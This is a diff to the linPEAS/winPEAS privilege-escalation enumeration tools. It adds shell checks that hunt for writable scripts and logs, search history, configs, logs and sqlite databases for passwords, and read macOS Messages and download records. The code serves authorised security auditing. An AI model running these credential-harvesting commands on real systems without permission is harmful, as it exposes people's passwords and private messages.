+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title ".sh files in path"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path"
+  echo $PATH | tr ":" "\n" | while read d; do
+    for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do
+      if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
+        echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
+      elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
+        echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+      else
+        echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
+      fi
+    done
+  done
+  echo ""
+
+  broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken)
+  if [ "$broken_links" ] || [ "$DEBUG" ]; then 
+    print_2title "Broken links in path"
+    echo $PATH | tr ":" "\n" | while read d; do
+      find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},";
+    done
+    echo ""
+  fi
+fi
+
+##-- IF) Date times inside firmware
+if [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Files datetimes inside the firmware (limit 50)"
+  find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50
+  echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"<date>\""
+  echo ""
+fi
+
+##-- IF) Executable files added by user
+print_2title "Executable files potentially added by user (limit 70)"
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70
+else
+  find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70
+fi
+echo ""
+
+
+
+if [ "$MACPEAS" ]; then
+  print_2title "Unsigned Applications"
+  macosNotSigned /System/Applications
+fi
+
+##-- IF) Unexpected in /opt
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if [ "$(ls /opt 2>/dev/null)" ]; then
+    print_2title "Unexpected in /opt (usually empty)"
+    ls -la /opt
+    echo ""
+  fi
+fi
+
+##-- IF) Unexpected folders in /
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Unexpected in root"
+  if [ "$MACPEAS" ]; then
+    (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
+  else
+    (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
+  fi
+  echo ""
+fi
+
+##-- IF) Modified interesting files into specific folders in the last 5mins
+print_2title "Modified interesting files in the last 5mins (limit 100)"
+find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
+echo ""
+
+##-- IF) Writable log files
+if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below
+print_2title "Writable log files (logrotten) (limit 50)"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation"
+  logrotate --version 2>/dev/null || echo_not_found "logrotate"
+  lastWlogFolder="ImPOsSiBleeElastWlogFolder"
+  logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
+  printf "%s\n" "$logfind" | while read log; do
+    if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
+      if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
+      elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
+      elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
+      elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
+      fi
+    fi
+  done
+fi
+
+echo ""
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  ##-- IF) Files inside my home
+  print_2title "Files inside $HOME (limit 20)"
+  (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
+  echo ""
+
+  ##-- IF) Files inside /home
+  print_2title "Files inside others home (limit 20)"
+  (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
+  echo ""
+
+  ##-- IF) Mail applications
+  print_2title "Searching installed mail applications"
+  ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq
+  echo ""
+
+  ##-- IF) Mails
+  print_2title "Mails (limit 50)"
+  (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found
+  echo ""
+
+  ##-- IF) Backup folders
+  if [ "$backup_folders" ] || [ "$DEBUG" ]; then
+    print_2title "Backup folders"
+    printf "%s\n" "$backup_folders" | while read b ; do
+      ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
+      ls -l "$b" 2>/dev/null && echo ""
+    done
+    echo ""
+  fi
+fi
+
+##-- IF) Backup files
+print_2title "Backup files (limited 100)"
+backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
+printf "%s\n" "$backs" | head -n 100 | while read b ; do
+  if [ -r "$b" ]; then
+    ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
+  fi;
+done
+echo ""
+
+##-- IF) DB files
+if [ "$MACPEAS" ]; then
+  print_2title "Reading messages database"
+  sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
+  sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
+  sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
+
+fi
+
+
+if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
+  print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)"
+  FILECMD="$(command -v file 2>/dev/null)"
+  printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+    if [ "$FILECMD" ]; then
+      echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+    else
+      echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+    fi
+  done
+  SQLITEPYTHON=""
+  echo ""
+  printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+    if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
+      if [ "$(command -v sqlite3 2>/dev/null)" ]; then
+        tables=$(sqlite3 $f ".tables" 2>/dev/null)
+        #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+      elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then
+        SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null)
+        tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
+        #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+      else
+        tables=""
+      fi
+      if [ "$tables" ] || [ "$DEBUG" ]; then
+          printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
+          printf "%s\n" "$tables" | while read t; do
+          columns=""
+          # Search for credentials inside the table using sqlite3
+          if [ -z "$SQLITEPYTHON" ]; then
+            columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
+          # Search for credentials inside the table using python
+          else
+            columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
+          fi
+          #Check found columns for interesting fields
+          INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
+          if [ "$INTCOLUMN" ]; then
+            printf ${BLUE}"  --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
+            printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
+            (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
+            echo ""
+          fi
+        done
+      fi
+    fi
+  done
+fi
+echo ""
+
+if [ "$MACPEAS" ]; then
+  print_2title "Downloaded Files"
+  sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
+fi
+
+##-- IF) Web files
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Web files?(output limit)"
+  ls -alhR /var/www/ 2>/dev/null | head
+  ls -alhR /srv/www/htdocs/ 2>/dev/null | head
+  ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
+  ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
+  echo ""
+fi
+
+##-- IF) All hidden files
+print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
+find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70
+echo ""
+
+##-- IF) Readable files in /tmp, /var/tmp, backups
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
+  filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70)
+  printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
+  echo ""
+fi
+
+##-- IF) Passwords in history cmd
+if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then
+  print_2title "Searching passwords in history cmd"
+  history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  echo ""
+fi
+
+##-- IF) Passwords in history files
+if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then
+  print_2title "Searching passwords in history files"
+  printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done
+  echo ""
+fi
+
+##-- IF) Passwords in config PHP files
+if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then
+  print_2title "Searching passwords in config PHP files"
+  printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
+  echo ""
+fi
+
+##-- IF) Passwords files in home
+if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then
+  print_2title "Searching *password* or *credential* files in home (limit 70)"
+  (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print "  #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
+  echo ""
+fi
+
+##-- IF) TTY passwords
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Checking for TTY (sudo/su) passwords in audit logs"
+  aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
+  find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
+  echo ""
+fi
+
+##-- IF) IPs inside logs
+if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then
+  print_2title "Searching IPs inside logs (limit 70)"
+  (find /var/log/ /var/logs /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
+  echo ""
+fi
+
+##-- IF) Passwords inside logs
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Searching passwords inside logs (limit 70)"
+  (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
+  echo ""
+fi
+
+if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then
+  ##-- IF) Emails inside logs
+  print_2title "Searching emails inside logs (limit 70)"
+  (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
+  echo ""
+fi
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
+  ##-- IF) Find possible files with passwords
+  print_2title "Searching possible password variables inside key folders (limit 140)"
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+    timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+    timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+  else
+    timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+  fi
+  wait
+  echo ""
+
+  ##-- IF) Find possible conf files with passwords
+  print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)"
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+    ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
+  else
+    ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
+  fi
+  printf "%s\n" "$ppicf" | while read f; do
+    if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then
+      echo "$ITALIC $f$NC"
+      grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
+    fi
+  done
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/linpeas_base.sh
+++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh
--- a/linPEAS/builder/src/linpeasBuilder.py
+++ b/linPEAS/builder/src/linpeasBuilder.py
@@ -2,6 +2,7 @@ import re
 import requests
 import base64
 import os
+from pathlib import Path

 from .peasLoaded import PEASLoaded
 from .peassRecord import PEASRecord
@@ -11,7 +12,6 @@ from .yamlGlobals import (
    PEAS_FINDS_MARKUP,
    PEAS_FINDS_CUSTOM_MARKUP,
    PEAS_STORAGES_MARKUP,
-    PEAS_STORAGES_MARKUP,
    INT_HIDDEN_FILES_MARKUP,
    ROOT_FOLDER,
    STORAGE_TEMPLATE,
@@ -129,7 +129,6 @@ class LinpeasBuilder:
        #Check for empty seds
        assert 'sed -${E} "s,,' not in self.linpeas_sh
    
-    
    def __get_peass_marks(self):
        return re.findall(r'peass\{[\w\-\._ ]*\}', self.linpeas_sh)

@@ -372,7 +371,6 @@ class LinpeasBuilder:
        return (suidVB, sudoVB, capsVB)
    
    def __generate_regexes_search(self) -> str:
-        paths_to_search = REGEXES_LOADED["paths"]
        regexes = REGEXES_LOADED["regular_expresions"]

        regexes_search_section = ""
@@ -386,31 +384,18 @@ class LinpeasBuilder:
                caseinsensitive = entry.get("caseinsensitive", False)
                regex = entry["regex"]
                regex = regex.replace('"', '\\"').strip()
-                extra_grep = entry.get("extra_grep")
-                extra_grep = f"| grep {extra_grep}" if extra_grep else ""
+                falsePositives = entry.get("falsePositives", False)

-                regexes_search_section += f'print_3title_no_nl "Searching {name} (limited to 50)..."\n'
+                if falsePositives:
+                    continue
                
-                # If custom folder to search in
-                regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n'
-                regexes_search_section += "  timeout 120 find \"$ROOT_FOLDER\" -type f -not -path \"*/node_modules/*\" -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
+                regexes_search_section += f"    search_for_regex \"{name}\" \"{regex}\" {'1' if caseinsensitive else ''}\n"
                
-                # If search in all the file system
-                regexes_search_section += 'else\n'
-                for path in paths_to_search:
-                    grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE"
-                    regexes_search_section += "  timeout 120 find "+path+" -type f -not -path \"*/node_modules/*\" -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
-                regexes_search_section += 'fi\n'
-                
-                regexes_search_section += "wait\n"
-            
-            regexes_search_section += "echo ''\n"
+            regexes_search_section += "    echo ''\n\n"

        return regexes_search_section


-
-
    def __replace_mark(self, mark: str, find_calls: list, join_char: str):
        """Substitude the markup with the actual code"""
        
--- a/linPEAS/builder/src/yamlGlobals.py
+++ b/linPEAS/builder/src/yamlGlobals.py
@@ -1,5 +1,26 @@
 import os
 import yaml
+import requests
+from pathlib import Path
+
+
+def download_regexes():
+    print("[+] Downloading regexes...")
+    url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"
+    response = requests.get(url)
+    if response.status_code == 200:
+        # Save the content of the response to a file
+        script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
+        target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'regexes.yaml'
+
+        with open(target_file, "w") as file:
+            file.write(response.text)
+        print(f"Downloaded and saved in '{target_file}' successfully!")
+    else:
+        print("Error: Unable to download the regexes file.")
+        exit(1)
+
+download_regexes()

 CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))

@@ -41,14 +62,19 @@ LINPEAS_PARTS = [
        "file_path": LINPEAS_BASE_PARTS + "/7_software_information.sh"
    },
    {
-        "name": "Interesting Files",
+        "name": "Files with Interesting Permissions",
+        "name_check": "interesting_perms_files",
+        "file_path": LINPEAS_BASE_PARTS + "/8_interesting_perms_files.sh"
+    },
+    {
+        "name": "Other Interesting Files",
        "name_check": "interesting_files",
-        "file_path": LINPEAS_BASE_PARTS + "/8_interesting_files.sh"
+        "file_path": LINPEAS_BASE_PARTS + "/9_interesting_files.sh"
    },
    {
        "name": "API Keys Regex",
        "name_check": "api_keys_regex",
-        "file_path": LINPEAS_BASE_PARTS + "/9_api_keys_regex.sh"
+        "file_path": LINPEAS_BASE_PARTS + "/10_api_keys_regex.sh"
    }
 ]

--- a/winPEAS/winPEASbat/winPEAS.bat
+++ b/winPEAS/winPEASbat/winPEAS.bat
@@ -52,7 +52,7 @@ CALL :ColorLine "   %E%41mUse it at your own networks and/or with the network ow
 ECHO.

 :SystemInfo
-CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
+CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
 CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
 ECHO.   [i] Check for vulnerabilities for the OS version with the applied patches
 ECHO.   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
@@ -404,7 +404,7 @@ CALL :T_Progress 1

 :CurrentClipboard
 CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
-ECHO.   [i] Any password inside the clipboard?
+ECHO.   [i] Any passwords inside the clipboard?
 powershell -command "Get-Clipboard" 2>nul
 ECHO.
 CALL :T_Progress 1
--- a/winPEAS/winPEASexe/Tests/Properties/AssemblyInfo.cs
+++ b/winPEAS/winPEASexe/Tests/Properties/AssemblyInfo.cs
@@ -1,5 +1,4 @@
 using System.Reflection;
-using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;

 // General Information about an assembly is controlled through the following
--- a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
@@ -27,8 +27,8 @@ namespace winPEAS.Checks
            {
                Beaprint.MainPrint("Current Active Window Application");
                string title = ApplicationInfoHelper.GetActiveWindowTitle();
-                List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, winPEAS.Checks.Checks.CurrentUserSiDs);
-                List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, winPEAS.Checks.Checks.CurrentUserSiDs);
+                List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, Checks.CurrentUserSiDs);
+                List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, Checks.CurrentUserSiDs);
                if (permsFile.Count > 0)
                {
                    Beaprint.BadPrint("    " + title);
@@ -188,8 +188,8 @@ namespace winPEAS.Checks

                foreach (Dictionary<string, string> sapp in scheduled_apps)
                {
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
-                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], Checks.CurrentUserSiDs);
+                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], Checks.CurrentUserSiDs);
                    string formString = "    ({0}) {1}: {2}";

                    if (fileRights.Count > 0)
@@ -238,8 +238,8 @@ namespace winPEAS.Checks
                foreach (var driver in DeviceDrivers.GetDeviceDriversNoMicrosoft())
                {
                    string pathDriver = driver.Key;
-                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
-                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, Checks.CurrentUserSiDs);
+                    List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, Checks.CurrentUserSiDs);

                    Dictionary<string, string> colorsD = new Dictionary<string, string>()
                        {
--- a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
@@ -363,8 +363,8 @@ namespace winPEAS.Checks
            try
            {
